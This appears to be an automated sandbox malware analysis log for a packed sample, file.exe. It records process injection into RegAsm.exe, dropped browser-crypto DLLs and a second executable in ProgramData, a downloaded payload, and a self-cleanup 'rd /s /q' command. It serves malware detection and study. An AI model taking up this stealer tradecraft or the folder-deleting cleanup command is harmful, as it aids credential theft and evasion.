Source: RegAsm.exe, 00000003.00000002.2393719883.00000000203E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2388519146.000000001A478000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: RegAsm.exe, 00000003.00000002.2403379667.00000000326D8000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: RegAsm.exe, 00000003.00000002.2393719883.00000000203E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2388519146.000000001A478000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: RegAsm.exe, 00000003.00000002.2403379667.00000000326D8000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe	Virustotal: Detection: 45%
Source: file.exe	ReversingLabs: Detection: 36%

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\BAAEHDBFID.exe "C:\ProgramData\BAAEHDBFID.exe"
Source: C:\ProgramData\BAAEHDBFID.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\BAAEHDBFID.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\HDAFIIDAKJDG" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\BAAEHDBFID.exe "C:\ProgramData\BAAEHDBFID.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\HDAFIIDAKJDG" & exit	Jump to behavior
Source: C:\ProgramData\BAAEHDBFID.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\ProgramData\BAAEHDBFID.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\ProgramData\BAAEHDBFID.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\BAAEHDBFID.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\BAAEHDBFID.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\BAAEHDBFID.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\ProgramData\BAAEHDBFID.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\ProgramData\BAAEHDBFID.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: mozglue.pdbP source: RegAsm.exe, 00000003.00000002.2397277169.00000000267FB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2417975487.000000006F90D000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.3.dr
Source:	Binary string: freebl3.pdb source: RegAsm.exe, 00000003.00000002.2394139552.000000002088D000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
Source:	Binary string: freebl3.pdbp source: RegAsm.exe, 00000003.00000002.2394139552.000000002088D000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
Source:	Binary string: nss3.pdb@ source: RegAsm.exe, 00000003.00000002.2408971921.000000003E5B1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.3.dr
Source:	Binary string: .pdbTQ source: 66ecb454d2b4a_lgfdsjgds[1].exe.3.dr, BAAEHDBFID.exe.3.dr
Source:	Binary string: .pdbT3 source: file.exe
Source:	Binary string: softokn3.pdb@ source: RegAsm.exe, 00000003.00000002.2403379667.00000000326D8000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: RegAsm.exe, 00000003.00000002.2406223335.0000000038644000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.3.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: RegAsm.exe, 00000003.00000002.2400468166.000000002C768000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.3.dr
Source:	Binary string: nss3.pdb source: RegAsm.exe, 00000003.00000002.2408971921.000000003E5B1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.3.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000003.00000002.2393719883.00000000203E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2388519146.000000001A478000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: RegAsm.exe, 00000003.00000002.2397277169.00000000267FB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2417975487.000000006F90D000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.3.dr
Source:	Binary string: softokn3.pdb source: RegAsm.exe, 00000003.00000002.2403379667.00000000326D8000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_004188A9 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

3_2_004188A9

Source: freebl3.dll.3.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.3.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.3.dr	Static PE information: section name: .didat
Source: softokn3.dll.3.dr	Static PE information: section name: .00cfg
Source: nss3.dll.3.dr	Static PE information: section name: .00cfg

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042F0A2 push ecx; ret	3_2_0042F0B5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00422C99 push esi; ret	3_2_00422C9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041DD15 push ecx; ret	3_2_0041DD28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00432715 push 0000004Ch; iretd	3_2_00432726

Source: file.exe	Static PE information: section name: .text entropy: 7.997245276526226
Source: BAAEHDBFID.exe.3.dr	Static PE information: section name: .text entropy: 7.996423179699673
Source: 66ecb454d2b4a_lgfdsjgds[1].exe.3.dr	Static PE information: section name: .text entropy: 7.996423179699673

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66ecb454d2b4a_lgfdsjgds[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\BAAEHDBFID.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\BAAEHDBFID.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

3_2_004188A9

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BAAEHDBFID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BAAEHDBFID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BAAEHDBFID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BAAEHDBFID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BAAEHDBFID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BAAEHDBFID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BAAEHDBFID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BAAEHDBFID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BAAEHDBFID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BAAEHDBFID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BAAEHDBFID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BAAEHDBFID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BAAEHDBFID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BAAEHDBFID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BAAEHDBFID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BAAEHDBFID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BAAEHDBFID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BAAEHDBFID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
